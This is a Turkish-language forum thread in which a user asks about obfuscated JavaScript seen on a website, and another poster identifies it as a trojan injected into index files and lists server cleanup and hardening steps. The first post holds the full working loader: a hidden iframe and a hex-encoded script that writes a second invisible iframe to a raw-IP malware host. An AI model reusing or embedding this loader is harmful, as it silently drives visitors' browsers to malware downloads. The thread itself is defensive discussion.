Şu Javascript Kodu Nedir?

[sverdlow]

bu kod hakkında fikri olan var mı?
ne iş yapabilir, maksimum yapabilecekleri nelerdir.
aklıma cookie çalmak geliyor ilk önce. firefoxa işler mi?

Kod:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4762e640a5959(v4762e640a5d40){ function v4762e640a6129 () {var v4762e640a650f=16; return v4762e640a650f;} return(parseInt(v4762e640a5d40,v4762e640a6129()));}function v4762e640a68f6(v4762e640a6cdf){ function v4762e640a7897 () {var v4762e640a7c80=2; return v4762e640a7c80;} var v4762e640a70c5='';for(v4762e640a74ac=0; v4762e640a74ac<v4762e640a6cdf.length; v4762e640a74ac+=v4762e640a7897()){ v4762e640a70c5+=(String.fromCharCode(v4762e640a5959(v4762e640a6cdf.substr(v4762e640a74ac, v4762e640a7897()))));}return v4762e640a70c5;} document.write(v4762e640a68f6('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6166207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3933343936292B27316336636331653834355C272077696474683D343033206865696768743D323332207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

[nokie]

bu kodu derhal o sayfadan kaldır, ziyaretçilerine trojan download ettiriyor başka bir serverdan, biri serverına erişmiş.

malware bu, serverındaki tüm index.* adlı dosyaları otomatik yerleştiriyor kendini.

serverını olası exploitlere karşı tarama yap, /dev/shm, /tmp, /usr/local/apache/proxy , /var/spool, /var/tmp dizinlerine perl script olarak bulaşıyor.

ayrıca bilgisayarınıda full virüs taramasından geçirmeni tavsiye ederim, kullandığın web editörlerine kadar bulaştırıyor kendini (notepad, ultraedit, dreamweaver v.b.) dosyayı kaydet dediğinde sayfanın en altına ekleniyor kod otomatik.

Yapacağın işlemler:

1. Serverına eriş, /dev/shm, /tmp, /usr/local/apache/proxy , /var/spool, /var/tmp dizinlerini korumaya al ve dizinler içindeki olası exploitleri tespit edip temizle.

2. Site için klasör ve dosya yazma izinlerini kontrol et (chmod 0777 olmamalı)

3. Siteye ait ftp şifresini değiştir.

4. Serverda bulunan tüm index adlı dosyalardan trojan javascript kodunu temizle.

5. Kodun bulunduğu siteye girdiysen bilgisayarını full antivirüs taraması yaptır, bilgisayarına bulaşan malware'i temizle.

6. php_safe_mode aktif et.

7. sitende klasöre yazma ihtiyacı duyan yazılımlar varsa, klasörleri dışardan erişilmeyen bir yere taşı (public_html dışına, script yine çalışır) bu sayede chmod0777 guvenle kullanabilirsin.

8. siten için tüm alt klasörleri sh, .pl, cgi v.b. dosyalarının dışardan çalıştırılmaya kapat, htaccess ile bunu yapabilirsin.

9. server root ve normal kullanıcı şifrelerini değiştir.

10. son olarak serverını bütüyle elegeçirmiş olabileceğini düşünüyorsan bir sistem yöneticisine başvur.

[sverdlow]

anlattıkların için sağol, ama bende sorun yok, bi sitede gördüm ve dikkatimi çekti.
random olarak her seferinde başka bir iş yaptırıyor, yahoo maile bağlanıyor vs.
bilgisayar o siteye girince biraz kasıldı, ama iyice kontrol ettim, bir sorun yok görünüyor.

[Breeze]

ie6 ile girmişsen bilgisayara virus bulaştırmıştır
diğer tarayıcılarda iş görürmü bilmiyorum